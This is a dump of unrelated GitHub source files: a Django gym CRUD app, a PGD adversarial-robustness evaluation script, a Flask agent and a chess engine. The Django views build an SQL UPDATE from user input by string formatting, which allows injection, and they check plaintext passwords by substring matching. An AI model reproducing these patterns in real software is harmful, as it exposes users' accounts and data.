    \n \"\"\"\n for i in x:\n if nombre in i:\n print(\"yes\")\n return HttpResponse(template)\n \n else:\n usuario.save()\n return render(request, \"login.html\", {\"usuarios\": usuario})\n\n \n \n\n\ndef redireccionindex(request):\n nombre = request.POST[\"usuario\"]\n contraseña = request.POST[\"contraseña\"]\n d_b = \"registro.db\"\n coneccion = sql.connect(d_b)\n cursor = coneccion.cursor()\n cursor.execute(\"SELECT * FROM sheshagym_register_data\")\n users = cursor.fetchall()\n for user in users:\n if nombre in user:\n print(\"yes c\")\n if contraseña in user:\n print(\"yes b\")\n return render(request, \"index.html\", {\"usuario\": user,\"user\": nombre})\n else:\n template = \"\"\"\n
    \n

    login invalido

    \n

    El usuario o contaseña esta mal

    \n

    Vuelva e intente de nuevo

    \n \n
    \n \"\"\"\n return HttpResponse(template)\n\n\ndef eliminardatos(request, id_table):\n eliminar = comentario.objects.get(id=id_table)\n eliminar.delete()\n return redirect(\"index\")\n\ndef cogerdatos(request):\n texto = comentario(texto = request.POST[\"texto_usuario\"])\n texto.save()\n return redirect(\"index\")\n\n\ndef editpage(request, id_table):\n eliminar = comentario.objects.get(id=id_table)\n print(eliminar)\n return render(request, \"edit.html\", {\"id\": eliminar}) \n\n\ndef cogerdatosnuevos(request, id_table):\n eliminar = comentario.objects.get(id=id_table)\n print(eliminar.id)\n d_b = \"registro.db\"\n coneccion = sql.connect(d_b)\n cursor = coneccion.cursor()\n nuevodato= comentario(texto = request.POST[\"nuevo_dato\"])\n cursor.execute(f\"UPDATE sheshagym_comentario SET texto = '{nuevodato.texto}' where id = {eliminar.id}\")\n coneccion.commit()\n coneccion.close()\n # nuevodato.save()\n print(nuevodato)\n return redirect(\"index\")\n\n\n\n \n\n\n\n\n \n \n ","repo_name":"LarsSong1/SHESHA-GYM-web-CRUD","sub_path":"sheshagym/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23954837809","text":"def observed():\n observations = []\n for index in range(3):\n observations.append(input(\"Please enter a observation:\"))\n return observations\n\ndef run():\n print(\"Counting observations....\")\n captured_observations = observed()\n empty_set = set()\n for value in captured_observations:\n empty_set.add((value,captured_observations.count(value)))\n\n for city in empty_set:\n print(f\"{city[0]} observed{city[1]}\")\n\nif __name__ == \"__main__\":\n run()\n\n\n\n","repo_name":"DAghaSolent/com411","sub_path":"data/sets/set_from_list.py","file_name":"set_from_list.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37676777809","text":"\nimport torch.nn.functional as F\nfrom tqdm import tqdm, trange\nimport torch\n\n\ndef set_robustness_attack_config(attack_norm, attack_epsilon, attack_alpha, attack_iters, attack_random_restarts,\n targeted):\n if attack_norm == 'l2':\n constraint = '2'\n elif attack_norm == 'linf':\n constraint = 'inf'\n elif attack_norm == 'none':\n constraint = 'unconstrained'\n elif attack_norm == 'fourier':\n constraint = 'fourier'\n else:\n constraint = 'unconstrained'\n attack_kwargs = {\n 'constraint': constraint, # use L2-PGD\n 'eps': attack_epsilon, # L2 radius around original image\n 'step_size': attack_alpha,\n 'iterations': attack_iters,\n 'targeted': targeted,\n 'random_restarts': attack_random_restarts,\n 'do_tqdm': False,\n }\n return attack_kwargs\n\n\ndef conduct_pgd(attack_iters_lst, attack_epsilon_lst, attack_norm_lst, attack_alpha_lst, pgd_random_restarts,\n test_attack_loader, augmenter, attack_targeted):\n device = augmenter.device\n attack_losses = {}\n attack_accs = {}\n for attack_norm_i in trange(len(attack_norm_lst), desc='attack norm loop'):\n attack_norm = attack_norm_lst[attack_norm_i]\n attack_epsilon_lst_i = attack_epsilon_lst[attack_norm_i]\n attack_alpha_lst_i = attack_alpha_lst[attack_norm_i]\n\n attack_losses[attack_norm] = {}\n attack_accs[attack_norm] = {}\n for attacks_iter_i in trange(len(attack_iters_lst), desc='attack iter loop'):\n attack_iter = attack_iters_lst[attacks_iter_i]\n attack_losses[attack_norm][attack_iter] = {}\n attack_accs[attack_norm][attack_iter] = {}\n for 
attacks_eps_i in trange(len(attack_epsilon_lst_i),\n desc='attack epsilon loop with {} iter'.format(\n attack_iter)):\n attack_epsilon = attack_epsilon_lst_i[attacks_eps_i]\n attack_alpha = attack_alpha_lst_i[attacks_eps_i]\n robustness_attack_config = set_robustness_attack_config(attack_norm,\n attack_epsilon,\n attack_alpha,\n attack_iter,\n pgd_random_restarts,\n attack_targeted)\n print('\\nStart attacking with epsilon : {}\\talpha : {} \\t iter : {}...'.format(\n attack_epsilon,\n attack_alpha,\n attack_iter))\n\n count_total = 0.\n correct_total = 0.\n detached_loss_total = 0.\n\n # for sorted_ix, batch in enumerate(tqdm(test_attack_loader, desc='attack loop')):\n for test_i, batch in enumerate(\n tqdm(test_attack_loader, desc='attack loop (val)')):\n # setting model to eval mode\n augmenter.set_eval()\n\n X, y = batch\n if attack_targeted:\n # shift the labels up.\n y_target = y + 1\n y_target %= (test_attack_loader.dataset.classes.__len__() - 1)\n else:\n y_target = y\n X, y, y_target = X.to(device), y.to(device), y_target.to(device)\n X_adv = augmenter.adv_example(X, y_target, robustness_attack_config)\n\n # calc the loss on adv. examples\n with torch.no_grad():\n outputs = augmenter.eval_mode_pred(X_adv)\n val_loss = augmenter.calc_eval_loss_from_output(outputs, y)\n\n _, predictions = torch.max(outputs.data, 1)\n count_total += y.size(0)\n detached_loss_total += val_loss\n correct_total += predictions.eq(y.data).sum().float().cpu().numpy().item()\n\n attack_loss = detached_loss_total / count_total\n attack_acc = 100. * correct_total / count_total\n\n print('Finished attacking with epsilon : {} \\t iter : {}...\\n'.format(\n attack_epsilon,\n attack_iter))\n print('Attack Test Loss: {:.5f}, Acc: {:.5f}'.format(attack_loss, attack_acc))\n\n attack_losses[attack_norm][attack_iter][attack_epsilon] = attack_loss\n attack_accs[attack_norm][attack_iter][attack_epsilon] = attack_acc\n\n return attack_losses, attack_accs\n","repo_name":"eghbalz/rethink_da_for_ar","sub_path":"attacks/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18286727882","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\nEsqueleto de agente usando los servicios web de Flask\n\n/comm es la entrada para la recepcion de mensajes del agente\n/Stop es la entrada que para el agente\n\nTiene una funcion AgentBehavior1 que se lanza como un thread concurrente\n\nAsume que el agente de registro esta en el puerto 9000\n\n\"\"\"\nfrom __future__ import print_function\nfrom multiprocessing import Process, Queue\nimport socket\nfrom string import Template\n\nfrom rdflib import Namespace, Graph, RDF\nfrom rdflib.namespace import FOAF\nimport uuid\nfrom flask import Flask, request, render_template\nimport sys\nimport constants.FIPAACLPerformatives as performatives\nfrom AgentUtil.ACLMessages import build_message, send_message\nfrom AgentUtil.FlaskServer import shutdown_server\nfrom AgentUtil.OntoNamespaces import ACL\nfrom AgentUtil.Agent import Agent\nimport requests\nimport os\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\n\nimport constants.OntologyConstants as OntologyConstants\nfrom orderRequest import OrderRequest\nfrom rdflib.term import Literal\n\n\n# Configuration stuff\nhostname = '0.0.0.0'\nport = 9015\n\nimport os\ndirectory_hostname = os.environ['DIRECTORY_HOST'] or hostname\n\nagn = Namespace(OntologyConstants.ONTOLOGY_URI)\n\n# Contador de mensajes\nmss_cnt = 0\n\n# Datos del 
Agente\n\nExternalSellerAgent = Agent('SellerExternalAgent',\n agn.SellerExternalAgent,\n 'http://%s:%d/comm' % (hostname, port),\n 'http://%s:%d/Stop' % (hostname, port))\n\n# Directory agent address\nDirectoryAgent = Agent('DirectoryAgent',\n agn.Directory,\n 'http://%s:9000/Register' % directory_hostname,\n 'http://%s:9000/Stop' % directory_hostname)\n\n\n# Global triplestore graph\ndsgraph = Graph()\n\ncola1 = Queue()\n\n# Flask stuff\napp = Flask(__name__, template_folder='./templates')\n\n\ndef add_product_to_graph(g, product_id, product_name, product_description, weight_grams, brand, price, category, seller):\n g.add((agn[product_id], agn.product_name, Literal(product_name)))\n g.add((agn[product_id], agn.product_id, Literal(product_id)))\n g.add((agn[product_id], agn.product_description, Literal(product_description)))\n g.add((agn[product_id], agn.weight_grams, Literal(weight_grams)))\n g.add((agn[product_id], agn.brand, Literal(brand)))\n g.add((agn[product_id], agn.price_eurocents, Literal(price)))\n g.add((agn[product_id], agn.category, Literal(category)))\n g.add((agn[product_id], agn.seller, Literal(seller)))\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef welcome():\n if request.method == 'GET':\n return render_template('external_seller.html')\n\n message = Graph()\n\n product_id = uuid.uuid4()\n add_product_to_graph(\n message,\n product_id,\n request.form['product_name'],\n request.form['product_description'],\n int(request.form['weight_grams']),\n request.form['brand'],\n int(int(request.form['price_euros']) / 100),\n request.form['category'],\n request.form['seller']\n )\n\n message.add((agn[product_id], RDF.type, Literal(OntologyConstants.ACTION_ADD_EXT)))\n\n vendor_agent = ExternalSellerAgent.find_agent(DirectoryAgent, agn.VendorAgent)\n\n msg = build_message(\n message,\n perf=Literal(performatives.REQUEST),\n sender=ExternalSellerAgent.uri,\n receiver=vendor_agent.uri,\n msgcnt=get_new_msg_count(),\n content=agn[product_id]\n )\n\n send_message(msg, vendor_agent.address)\n\n return render_template('external_seller.html')\n\ndef get_new_msg_count():\n global mss_cnt\n mss_cnt += 1\n return mss_cnt\n\n@app.route(\"/comm\")\ndef comunicacion():\n \"\"\"\n Entrypoint de comunicacion\n \"\"\"\n return\n\n\n@app.route(\"/Stop\")\ndef stop():\n \"\"\"\n Entrypoint que para el agente\n\n :return:\n \"\"\"\n tidyup()\n shutdown_server()\n return \"Parando Servidor\"\n\n\ndef tidyup():\n \"\"\"\n Acciones previas a parar el agente\n\n \"\"\"\n pass\n\n\ndef agentbehavior1(cola):\n \"\"\"\n Un comportamiento del agente\n\n :return:\n \"\"\"\n\n ExternalSellerAgent.register_agent(DirectoryAgent)\n\n pass\n\n\nif __name__ == '__main__':\n # Ponemos en marcha los behaviors\n ab1 = Process(target=agentbehavior1, args=(cola1,))\n ab1.start()\n\n # Ponemos en marcha el servidor\n app.run(host=hostname, port=port, debug=True)\n\n # Esperamos a que acaben los behaviors\n ab1.join()\n print('The End')\n\n\n","repo_name":"carlotacb/FiberZone","sub_path":"implementation/SellerExternalAgent.py","file_name":"SellerExternalAgent.py","file_ext":"py","file_size_in_byte":4475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37842705082","text":"\"\"\"\nThis class is responsible for storing all information about the current state of a chess game. It will also\nbe responsible for determining the valid moves at the current state. 
It will also keep a move log.\n\"\"\"\n\nclass GameState():\n    def __init__(self):\n        # board is an 8x8 2D list, each element of the list has 2 characters\n        # the first character represents the color of the piece, 'b' or 'w'\n        # the second character represents the type of the piece, 'K', 'Q', 'R', 'B', 'N' or 'P'\n        # \"--\" represents an empty space with no piece\n        self.board = [\n            [\"bR\", \"bN\", \"bB\", \"bQ\", \"bK\", \"bB\", \"bN\", \"bR\"],\n            [\"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\"],\n            [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n            [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n            [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n            [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n            [\"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\"],\n            [\"wR\", \"wN\", \"wB\", \"wQ\", \"wK\", \"wB\", \"wN\", \"wR\"]\n        ]\n        self.moveFunctions = {'p': self.getPawnMoves, 'R': self.getRookMoves, 'N': self.getKnightMoves,\n                              'B': self.getBishopMoves, 'Q': self.getQueenMoves, 'K': self.getKingMoves}\n        self.whiteToMove = True\n        self.moveLog = []\n        self.whiteKingLocation = (7, 4)\n        self.blackKingLocation = (0, 4)\n        self.inCheck = False\n        self.pins = []\n        self.checks = []\n        self.enpassantPossible = () # coordinates for the square where en passant capture is possible\n        self.currentCastlingRight = CastleRights(True, True, True, True)\n        self.castleRightsLog = [CastleRights(self.currentCastlingRight.wks, self.currentCastlingRight.bks, self.currentCastlingRight.wqs, self.currentCastlingRight.bqs)]\n\n\n    def makeMove(self, move):\n        self.board[move.startRow][move.startCol] = \"--\"\n        self.board[move.endRow][move.endCol] = move.pieceMoved\n        self.moveLog.append(move) # log the move so we can undo later\n        self.whiteToMove = not self.whiteToMove # switch turns\n        # update the king's location if moved\n        if move.pieceMoved == 'wK':\n            self.whiteKingLocation = (move.endRow, move.endCol)\n        if move.pieceMoved == 'bK':\n            self.blackKingLocation = (move.endRow, move.endCol)\n\n        # pawn promotion\n        if move.isPawnPromotion:\n            self.board[move.endRow][move.endCol] = move.pieceMoved[0] + 'Q'\n        # en passant\n        if move.isEnpassantMove:\n            self.board[move.startRow][move.endCol] = \"--\" # capture the pawn\n        # update enpassantPossible variable\n        if move.pieceMoved[1] == 'p' and abs(move.startRow - move.endRow) == 2: # only on 2 square pawn advances\n            self.enpassantPossible = ((move.startRow + move.endRow) // 2, move.startCol)\n        else:\n            self.enpassantPossible = ()\n\n        # castle move\n        if move.isCastleMove:\n            if move.endCol - move.startCol == 2: # kingside castle move\n                self.board[move.endRow][move.endCol - 1] = self.board[move.endRow][move.endCol + 1] # move the rook\n                self.board[move.endRow][move.endCol + 1] = \"--\" # erase old rook\n            else: # queenside castle move\n                self.board[move.endRow][move.endCol + 1] = self.board[move.endRow][move.endCol - 2] # move the rook\n                self.board[move.endRow][move.endCol - 2] = \"--\" # erase old rook\n        # update castling rights - whenever it is a rook or king move\n        self.updateCastleRights(move)\n        self.castleRightsLog.append(CastleRights(self.currentCastlingRight.wks, self.currentCastlingRight.bks, self.currentCastlingRight.wqs, self.currentCastlingRight.bqs))\n\n\n    '''\n    Undo the last move\n    '''\n\n    def undoMove(self):\n        if len(self.moveLog) != 0: # make sure that there is a move to undo\n            move = self.moveLog.pop()\n            self.board[move.startRow][move.startCol] = move.pieceMoved\n            
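# restore whatever occupied the landing square (\"--\" for quiet moves; the en passant branch below corrects that special case)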
self.board[move.endRow][move.endCol] = move.pieceCaptured\n            self.whiteToMove = not self.whiteToMove # switch turns\n            # update the king's position if needed\n            if move.pieceMoved == 'wK':\n                self.whiteKingLocation = (move.startRow, move.startCol)\n            elif move.pieceMoved == 'bK':\n                self.blackKingLocation = (move.startRow, move.startCol)\n            # undo en passant\n            if move.isEnpassantMove:\n                self.board[move.endRow][move.endCol] = \"--\" # leave landing square blank\n                self.board[move.startRow][move.endCol] = move.pieceCaptured\n                self.enpassantPossible = (move.endRow, move.endCol)\n            # undo a 2 square pawn advance\n            if move.pieceMoved[1] == 'p' and abs(move.startRow - move.endRow) == 2:\n                self.enpassantPossible = ()\n            # undo castling rights\n            self.castleRightsLog.pop() # get rid of new castle rights from the move we are undoing\n            self.currentCastlingRight = self.castleRightsLog[-1] # set the current castle rights to the last one in the list\n            # undo castle move\n            if move.isCastleMove:\n                if move.endCol - move.startCol == 2: # king side\n                    self.board[move.endRow][move.endCol + 1] = self.board[move.endRow][move.endCol - 1]\n                    self.board[move.endRow][move.endCol - 1] = \"--\"\n                else: # queen side\n                    self.board[move.endRow][move.endCol - 2] = self.board[move.endRow][move.endCol + 1]\n                    self.board[move.endRow][move.endCol + 1] = \"--\"\n\n        self.inCheck = False\n    # update the castle rights given the move\n    def updateCastleRights(self, move):\n        if move.pieceMoved == 'wK':\n            self.currentCastlingRight.wks = False\n            self.currentCastlingRight.wqs = False\n        elif move.pieceMoved == 'bK':\n            self.currentCastlingRight.bks = False\n            self.currentCastlingRight.bqs = False\n        elif move.pieceMoved == 'wR':\n            if move.startRow == 7:\n                if move.startCol == 0: # left rook\n                    self.currentCastlingRight.wqs = False\n                elif move.startCol == 7: # right rook\n                    self.currentCastlingRight.wks = False\n        elif move.pieceMoved == 'bR':\n            if move.startRow == 0: # black rooks start on row 0\n                if move.startCol == 0: # left rook\n                    self.currentCastlingRight.bqs = False\n                elif move.startCol == 7: # right rook\n                    self.currentCastlingRight.bks = False\n    '''\n    All moves considering checks\n    '''\n    def getValidMoves(self):\n        moves = []\n        self.inCheck, self.pins, self.checks = self.checkForPinsAndChecks()\n        if self.whiteToMove:\n            kingRow = self.whiteKingLocation[0]\n            kingCol = self.whiteKingLocation[1]\n        else:\n            kingRow = self.blackKingLocation[0]\n            kingCol = self.blackKingLocation[1]\n\n        if self.inCheck:\n            if len(self.checks) == 1: # only 1 check, block check or move king\n                moves = self.getAllPossibleMoves()\n                # to block a check you must move a piece into one of the squares between the enemy piece and king\n                check = self.checks[0] # check information\n                checkRow = check[0]\n                checkCol = check[1]\n                pieceChecking = self.board[checkRow][checkCol] # enemy piece causing the check\n                validSquares = [] # squares that pieces can move to\n                # if knight, must capture knight or move king, other pieces can be blocked\n                if pieceChecking[1] == 'N':\n                    validSquares = [(checkRow, checkCol)]\n                else:\n                    for i in range(1, 8):\n                        validSquare = (kingRow + check[2] * i, kingCol + check[3] * i) # check[2] and check[3] are check directions\n                        validSquares.append(validSquare)\n                        if validSquare[0] == checkRow and validSquare[1] == checkCol: # once you get to piece and check\n                            break\n                # get rid of any moves that don't block check or move king\n                for i in range(len(moves) - 1, -1, -1): # go through backwards when you are removing from the list as iterating\n                    if moves[i].pieceMoved[1] != 'K': # move doesn't move king so it must 
block or capture\n if not (moves[i].endRow, moves[i].endCol) in validSquares: # move doesn't block check or capture piece\n moves.remove(moves[i])\n\n else:\n self.getKingMoves(kingRow, kingCol, moves)\n else: # not in check so all moves possible\n moves = self.getAllPossibleMoves()\n if self.whiteToMove:\n self.getCastleMove(self.whiteKingLocation[0], self.whiteKingLocation[1], moves)\n else:\n self.getCastleMove(self.blackKingLocation[0], self.blackKingLocation[1], moves)\n\n return moves\n '''\n All moves without considering checks\n '''\n def getAllPossibleMoves(self):\n moves = []\n for r in range(len(self.board)):\n for c in range(len(self.board[r])):\n turn = self.board[r][c][0]\n if (turn == 'w' and self.whiteToMove) or (turn == 'b' and not self.whiteToMove):\n piece = self.board[r][c][1]\n self.moveFunctions[piece](r, c, moves) # calls the appropriate move function based on piece type\n return moves\n\n\n\n\n '''\n Get all the pawn moves for the pawn located at row, col and add these moves to the list\n '''\n def getPawnMoves(self, r, c, moves):\n piecePinned = False\n pinDirection = ()\n for i in range(len(self.pins) - 1, -1, -1):\n if self.pins[i][0] == r and self.pins[i][1] == c:\n piecePinned = True\n pinDirection = (self.pins[i][2], self.pins[i][3])\n self.pins.remove(self.pins[i])\n break\n if self.whiteToMove:\n if self.board[r - 1][c] == \"--\": # 1 square move\n if not piecePinned or pinDirection == (-1, 0):\n moves.append(Move((r, c), (r - 1, c), self.board))\n if r == 6 and self.board[r - 2][c] == \"--\":\n moves.append(Move((r, c), (r - 2, c), self.board))\n # captures\n if c - 1 >= 0: # capture to left\n if self.board[r - 1][c - 1][0] == 'b':\n if not piecePinned or pinDirection == (-1, -1):\n moves.append(Move((r, c), (r - 1, c - 1), self.board))\n elif (r - 1, c - 1) == self.enpassantPossible:\n moves.append(Move((r, c), (r - 1, c - 1), self.board, isEnpassantMove=True))\n\n if c + 1 <= 7: # capture to right\n if self.board[r - 1][c + 1][0] == 'b':\n if not piecePinned or pinDirection == (-1, 1):\n moves.append(Move((r, c), (r - 1, c + 1), self.board))\n elif (r - 1, c + 1) == self.enpassantPossible:\n moves.append(Move((r, c), (r - 1, c + 1), self.board, isEnpassantMove=True))\n else:\n if self.board[r + 1][c] == \"--\":\n if not piecePinned or pinDirection == (1, 0):\n moves.append(Move((r, c), (r + 1, c), self.board))\n if r == 1 and self.board[r + 2][c] == \"--\":\n moves.append(Move((r, c), (r + 2, c), self.board))\n # captures\n if c - 1 >= 0: # capture to left\n if self.board[r + 1][c - 1][0] == 'w':\n if not piecePinned or pinDirection == (1, -1):\n moves.append(Move((r, c), (r + 1, c - 1), self.board))\n elif (r + 1, c - 1) == self.enpassantPossible:\n moves.append(Move((r, c), (r + 1, c - 1), self.board, isEnpassantMove=True))\n if c + 1 <= 7: # capture to right\n if self.board[r + 1][c + 1][0] == 'w':\n if not piecePinned or pinDirection == (1, 1):\n moves.append(Move((r, c), (r + 1, c + 1), self.board))\n elif (r + 1, c + 1) == self.enpassantPossible:\n moves.append(Move((r, c), (r + 1, c + 1), self.board, isEnpassantMove=True))\n # add pawn promotions later\n '''\n Get all the rook moves for the pawn located at row, col and add these moves to the list\n '''\n def getRookMoves(self, r, c, moves):\n piecePinned = False\n pinDirection = ()\n for i in range(len(self.pins) - 1, -1, -1):\n if self.pins[i][0] == r and self.pins[i][1] == c:\n piecePinned = True\n pinDirection = (self.pins[i][2], self.pins[i][3])\n if self.board[r][c][1] != 'Q': # can't remove 
queen from pin on rook moves, only remove it on bishop moves\n self.pins.remove(self.pins[i])\n break\n directions = ((-1, 0), (0, -1), (1, 0), (0, 1))\n enemyColor = \"b\" if self.whiteToMove else \"w\"\n for d in directions:\n for i in range(1, 8):\n endRow = r + d[0] * i\n endCol = c + d[1] * i\n if 0 <= endRow < 8 and 0 <= endCol < 8:\n if not piecePinned or pinDirection == d or pinDirection == (-d[0], -d[1]):\n endPiece = self.board[endRow][endCol]\n if endPiece == \"--\": # empty space valid\n moves.append(Move((r, c), (endRow, endCol), self.board))\n elif endPiece[0] == enemyColor: # enemy piece valid\n moves.append(Move((r, c), (endRow, endCol), self.board))\n break\n else: # friendly piece invalid\n break\n else:\n break\n\n\n def getKnightMoves(self, r, c, moves):\n piecePinned = False\n pinDirection = ()\n for i in range(len(self.pins) - 1, -1, -1):\n if self.pins[i][0] == r and self.pins[i][1] == c:\n piecePinned = True\n self.pins.remove(self.pins[i])\n break\n knightMoves = ((-2, -1), (-2, 1), (-1, -2), (-1, 2), (1, -2), (1, 2), (2, -1), (2, 1))\n allyColor = \"w\" if self.whiteToMove else \"b\"\n for m in knightMoves:\n endRow = r + m[0]\n endCol = c + m[1]\n if 0 <= endRow < 8 and 0 <= endCol < 8:\n if not piecePinned:\n endPiece = self.board[endRow][endCol]\n if endPiece[0] != allyColor: # not an ally piece (empty or enemy piece)\n moves.append(Move((r, c), (endRow, endCol), self.board))\n\n def getBishopMoves(self, r, c, moves):\n piecePinned = False\n pinDirection = ()\n for i in range(len(self.pins) - 1, -1, -1):\n if self.pins[i][0] == r and self.pins[i][1] == c:\n piecePinned = True\n pinDirection = (self.pins[i][2], self.pins[i][3])\n self.pins.remove(self.pins[i])\n break\n directions = ((-1, -1), (-1, 1), (1, -1), (1, 1)) # 4 diagonals\n enemyColor = \"b\" if self.whiteToMove else \"w\"\n for d in directions:\n for i in range(1, 8):\n endRow = r + d[0] * i\n endCol = c + d[1] * i\n if 0 <= endRow < 8 and 0 <= endCol < 8:\n if not piecePinned or pinDirection == d or pinDirection == (-d[0], -d[1]):\n endPiece = self.board[endRow][endCol]\n if endPiece == \"--\":\n moves.append(Move((r, c), (endRow, endCol), self.board))\n elif endPiece[0] == enemyColor:\n moves.append(Move((r, c), (endRow, endCol), self.board))\n break\n else:\n break\n else:\n break\n\n def getQueenMoves(self, r, c, moves):\n self.getRookMoves(r, c, moves)\n self.getBishopMoves(r, c, moves)\n\n def getKingMoves(self, r, c, moves):\n rowMoves = (-1, -1, -1, 0, 0, 1, 1, 1)\n colMoves = (-1, 0, 1, -1, 1, -1, 0, 1)\n allyColor = \"w\" if self.whiteToMove else \"b\"\n for i in range(8):\n endRow = r + rowMoves[i]\n endCol = c + colMoves[i]\n if 0 <= endRow < 8 and 0 <= endCol < 8:\n endPiece = self.board[endRow][endCol]\n if endPiece[0] != allyColor: # not an ally piece (empty or enemy piece)\n # place king on end square and check for checks\n if allyColor == 'w':\n self.whiteKingLocation = (endRow, endCol)\n else:\n self.blackKingLocation = (endRow, endCol)\n inCheck, pins, checks = self.checkForPinsAndChecks()\n if not inCheck:\n moves.append(Move((r, c), (endRow, endCol), self.board))\n # place king back on original location\n if allyColor == 'w':\n self.whiteKingLocation = (r, c)\n else:\n self.blackKingLocation = (r, c)\n\n '''\n Generate all valid castle moves for the king at (r, c) and add them to the list of moves\n '''\n def getCastleMove(self, r, c, moves):\n if self.inCheck:\n return # can't castle while we are in check\n if (self.whiteToMove and self.currentCastlingRight.wks) or (not 
self.whiteToMove and self.currentCastlingRight.bks):\n self.getKingsideCastleMoves(r, c, moves)\n if (self.whiteToMove and self.currentCastlingRight.wqs) or (not self.whiteToMove and self.currentCastlingRight.bqs):\n self.getQueensideCastleMoves(r, c, moves)\n def getKingsideCastleMoves(self, r, c, moves):\n if self.board[r][c + 1] == \"--\" and self.board[r][c + 2] == \"--\":\n if not self.squareUnderAttack(r, c + 1) and not self.squareUnderAttack(r, c + 2):\n moves.append(Move((r, c), (r, c + 2), self.board, isCastleMove=True))\n def getQueensideCastleMoves(self, r, c, moves):\n if self.board[r][c - 1] == \"--\" and self.board[r][c - 2] == \"--\" and self.board[r][c - 3] == \"--\":\n if not self.squareUnderAttack(r, c - 1) and not self.squareUnderAttack(r, c - 2):\n moves.append(Move((r, c), (r, c - 2), self.board, isCastleMove=True))\n\n def squareUnderAttack(self, r, c):\n self.whiteToMove = not self.whiteToMove # switch to opponent's turn\n oppMoves = self.getAllPossibleMoves()\n self.whiteToMove = not self.whiteToMove # switch turns back\n for move in oppMoves:\n if move.endRow == r and move.endCol == c: # square is under attack\n return True\n return False\n def checkForPinsAndChecks(self):\n pins = [] # squares where the allied pinned piece is and direction pinned from\n checks = [] # squares where enemy is applying a check\n inCheck = False\n if self.whiteToMove:\n enemyColor = \"b\"\n allyColor = \"w\"\n startRow = self.whiteKingLocation[0]\n startCol = self.whiteKingLocation[1]\n\n else:\n enemyColor = \"w\"\n allyColor = \"b\"\n startRow = self.blackKingLocation[0]\n startCol = self.blackKingLocation[1]\n # check outward from king for pins and checks, keep track of pins\n directions = ((-1, 0), (0, -1), (1, 0), (0, 1), (-1, -1), (-1, 1), (1, -1), (1, 1))\n for j in range(len(directions)):\n d = directions[j]\n possiblePin = ()\n for i in range(1, 8):\n endRow = startRow + d[0] * i\n endCol = startCol + d[1] * i\n if 0 <= endRow < 8 and 0 <= endCol < 8:\n endPiece = self.board[endRow][endCol]\n if endPiece[0] == allyColor and endPiece[1] != 'K':\n if possiblePin == (): # first allied piece could be pinned\n possiblePin = (endRow, endCol, d[0], d[1])\n else: # second allied piece, so no pin or check possible in this direction\n break\n elif endPiece[0] == enemyColor:\n type = endPiece[1]\n #5 possibilities here in this complex conditional\n #1.) orthogonally away from king and piece is a rook\n #2.) diagonally away from king and piece is a bishop\n #3.) 1 square away diagonally from king and piece is a pawn\n #4.) any direction and piece is a queen\n #5.) 
any direction 1 square away and piece is a king\n # (this is necessary to prevent a king move to a square controlled by another king)\n if (0 <= j <= 3 and type == 'R') or \\\n (4 <= j <= 7 and type == 'B') or \\\n (i == 1 and type == 'p' and ((enemyColor == 'w' and 6 <= j <= 7) or (enemyColor == 'b' and 4 <= j <= 5))) or \\\n (type == 'Q') or (i == 1 and type == 'K'):\n if possiblePin == (): # no piece blocking, so check\n inCheck = True\n checks.append((endRow, endCol, d[0], d[1]))\n break\n else: # piece blocking so pin\n pins.append(possiblePin)\n break\n else: # enemy piece not applying check\n break\n else: # off board\n break\n # check for knight checks\n knightMoves = ((-2, -1), (-2, 1), (-1, -2), (-1, 2), (1, -2), (1, 2), (2, -1), (2, 1))\n for m in knightMoves:\n endRow = startRow + m[0]\n endCol = startCol + m[1]\n if 0 <= endRow < 8 and 0 <= endCol < 8:\n endPiece = self.board[endRow][endCol]\n if endPiece[0] == enemyColor and endPiece[1] == \"N\": # enemy knight attacking king\n inCheck = True\n checks.append((endRow, endCol, m[0], m[1]))\n return inCheck, pins, checks\n\n\nclass CastleRights():\n def __init__(self, wks, bks, wqs, bqs):\n self.wks = wks\n self.bks = bks\n self.wqs = wqs\n self.bqs = bqs\n\nclass Move():\n\n ranksToRows = {\"1\": 7, \"2\": 6, \"3\": 5, \"4\": 4, \"5\": 3, \"6\": 2, \"7\": 1, \"8\": 0}\n rowsToRanks = {v: k for k, v in ranksToRows.items()}\n filesToCols = {\"a\": 0, \"b\": 1, \"c\": 2, \"d\": 3, \"e\": 4, \"f\": 5, \"g\": 6, \"h\": 7}\n colsToFiles = {v: k for k, v in filesToCols.items()}\n\n '''\n Overriding the equals method\n '''\n def __eq__(self, other):\n if isinstance(other, Move):\n return self.moveID == other.moveID\n return False\n\n def __init__(self, startSq, endSq, board, isEnpassantMove=False, isCastleMove=False):\n self.startRow = startSq[0]\n self.startCol = startSq[1]\n self.endRow = endSq[0]\n self.endCol = endSq[1]\n self.pieceMoved = board[self.startRow][self.startCol]\n self.pieceCaptured = board[self.endRow][self.endCol]\n self.isPawnPromotion = (self.pieceMoved == 'wp' and self.endRow == 0) or (self.pieceMoved == 'bp' and self.endRow == 7)\n self.isEnpassantMove = isEnpassantMove\n if self.isEnpassantMove:\n self.pieceCaptured = 'wp' if self.pieceMoved == 'bp' else 'bp'\n self.isCastleMove = isCastleMove\n self.moveID = self.startRow * 1000 + self.startCol * 100 + self.endRow * 10 + self.endCol\n\n def getChessNotation(self):\n return self.getRankFile(self.startRow, self.startCol) + self.getRankFile(self.endRow, self.endCol)\n\n def getRankFile(self, r, c):\n return self.colsToFiles[c] + 